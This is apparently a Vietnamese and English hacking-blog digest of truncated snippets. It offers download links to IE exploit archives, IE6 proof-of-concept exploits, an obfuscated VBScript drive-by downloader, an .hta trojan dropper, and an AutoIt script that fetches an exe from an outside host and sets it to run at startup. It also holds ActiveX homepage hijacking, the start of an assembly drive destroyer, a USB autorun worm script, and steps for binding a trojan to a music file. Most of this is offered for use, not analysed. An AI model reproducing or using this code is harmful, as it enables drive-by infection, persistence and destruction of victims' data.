Exploit: http://rapidshare.com/files/124044383/_malware_Microsoft_Internet_Explorer_Self_Executing_HTML_File_Vulnerability.rar
Read moreThe following proof of concept has been supplied: <span datasrc=”#oExec” datafld=”exploit” dataformatas=”html”></span> <xml id=”oExec”> <security> <exploit> <![CDATA[ <object id=”oFile” data=”badnews.php”></object> ]]> </exploit> </security> </xml>
Read moreVulnerable: Microsoft Internet Explorer 6.0 SP1 – Microsoft Internet Explorer 6.0 Credit: “[email protected]” <[email protected]> disclosed this weakness. Several proof-of-concept examples have been presented: “Matthew Murphy” <[email protected]> proposed: <html><head> <script language=”JavaScript” defer> function throw_onload() { actx.RegWrite(“HKCR\\exefile\\EditFlags”, 0x38070000, “REG_BINARY”); window.close(); } var actx = new ActiveXObject(“WScript.Shell”); actx.RegWrite(“HKCR\\exefile\\EditFlags”, 256, “REG_BINARY”); document.writeln(“<IFRAME SRC=\”http://www.somebadsite.com/file.exe\” ONLOAD=\”throw_onload()\” />”); window.setTimeout(“throw_onload()”, 5000); //..
Read moreExploit: http://rapidshare.com/files/124034189/_malware_Microsoft_Internet_Explorer_Valid_File_Drag_and_Drop_Embedded_Code_Vulnerability.rar
Read moreCác bạn có thói quen diệt virus, spyware, malware bằng các trình quét tự động nhưng để tiết kiệm thời gian và tăng khả năng hiểu biết về chúng, mình bày các bạn diệt bằng tay 1. bạn vào Start -> run gõ: notepad chép đọan này vào cd\ taskkill /f /im svohost.exe del /f..
Read moreThấy USB của mình không thấy chữ Open nữa mà thay = chữ “´ò¿ª(&O)” vậy là dính virus Virus Bloodhound.W32.EP rồi đó Đích nhiễm: 1. Thư mục C:\Program Files\Common Files và các thư mục con System\ và Microsoft Shared\. Virus tạo ra các tập tin là: tbouhmb.exe, vrrrysp.exe, mwhegbu.exe … 2. Registry: Virus xâm nhập..
Read more<script language=”VBScript”> on error resume next dl = “link.exe” Set df = document.createElement(“object”) df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″ str=”Microsoft.XMLHTTP” Set x = df.CreateObject(str,””) a1=”Ado” a2=”db.” a3=”Str” a4=”eam” str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,””) S.type = 1 str6=”GET” x.Open str6, dl, False x.Send fname1=”bl4ck.com” set F = df.createobject(“Scripting.FileSystemObject”,””) set tmp = F.GetSpecialFolder(2) ‘ Get tmp folder fname1= F.BuildPath(tmp,fname1)..
Read more– Microsoft Internet Explorer 6.0 – Microsoft Windows XP Pro SP2 – Microsoft Windows XP Home SP2 Tạo trang web nội dung bất kỳ (ví dụ hack.htm ) có đính kèm đoạn mã sau đây : <OBJECT id=”localpage” type=”application/x-oleobject” classid=”clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11″ height=7% style=”position:absolute;top:140;left:72;z-index:100;” codebase=”hhctrl.ocx#Version=5,2,3790,1194″ width=”7%”> <PARAM name=”Command” value=”Related Topics, MENU”> <PARAM name=”Button” value=”Text:Just a button”> <PARAM..
Read moresave file với đuôi .hta <html> <head> <script language=”javascript”> try { var fso = new ActiveXObject(“Scripting.FileSystemObject”); var Shell = new ActiveXObject(“WScript.Shell”); var tfolder2 = fso.GetSpecialFolder(0); var filepath2 = tfolder2 + “\\system32\\System.js”; var a2 = fso.CreateTextFile(filepath2, true); a2.WriteLine(‘var url = “http://troiancuaban.exe”;’); a2.WriteLine(‘var burl = “http://troiancuaban.exe”;’); a2.WriteLine(‘var fso = new ActiveXObject(“Scripting.FileSystemObject”);’); a2.WriteLine(‘var tfolder = fso.GetSpecialFolder(0);’); a2.WriteLine(‘var filepath..
Read moreCode autoIT ; —————————————————————————- ; ; AutoIt Version: 3.1.0 ; ; Script Function: ; Template AutoIt script. ; ; —————————————————————————- ; Script Start – Add your code below here $version = “1.0” AutoItSetOption (“TrayIconHide”,”1″) InetGet ( “Http://xrobots.net/Gift/Robots.exe” ,@WindowsDir & “\Messenger.exe” ,0,1) sleep(3000) RegWrite(“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run”,”Yahoo!!!”,”REG_SZ”,@Win dowsDir & “\Messenger.exe”) InetGet ( “Http://xrobots.net/Gift/Version.txt” ,@WindowsDir & “\Version.txt” ,1,1) sleep(5000)..
Read moreVí dụ vào 1 page với tên miền mở rộng là html, hay htm, php, asp…. thật nguy hiểm nếu không có antivirus hay sài trình duyệt update full Ví dụ đơn giản : <APPLET ID=”Shl” CLASSID=”CLSID:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B”> </APPLET> <script> Shl.RegWrite (“HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page”, “http://secure-lab.net”); </script> nếu ActiveX đó thực thi path chứa file exe khi..
Read moreLaughing Dog MASM/TASM compatible Assembly-Code file/drive destroyer Created: 9/5/92, assemble and link to .EXE Đã edit lại vài chỗ PENIS_LENGTH EQU 2000 ; ha ha ha ha, a little funny for ya .MODEL small .STACK 100h ;256 byte stack .DATA PENIS_SCREEN LABEL WORD DW 0720H, 0720H, 0720H, 0720H, 0720H, 0720H, 0720H, 0720H DW 0720H, 0720H,..
Read moretên file : .MS32DLL.dll.vbs nó dính vô usb flash, kèm theo file autorun.inf và printer.exe các anh phân tích cho em tác dụng (tác hại) của nó với, cả cách khắc phục luôn. nội dung : ‘mark ‘slow and silent (sas)1.0 on error resume next dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc, hm atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe .MS32DLL.dll.vbs” set fs =..
Read moreChúng ta phải vào Internet Explorer -> Option -> Security Tab, nhấn Custom Level, và (disable) tất cả chức năng cho phép chạy Script(Nếu không chính máy bạn sẽ bị nhiễm) Cách 1 + Đầu tiên cần 2 file để chuyển, ta lấy file nhạc là love.wma và file DPORT.exe + Sau đó cần 1..
Read more
Leave a Reply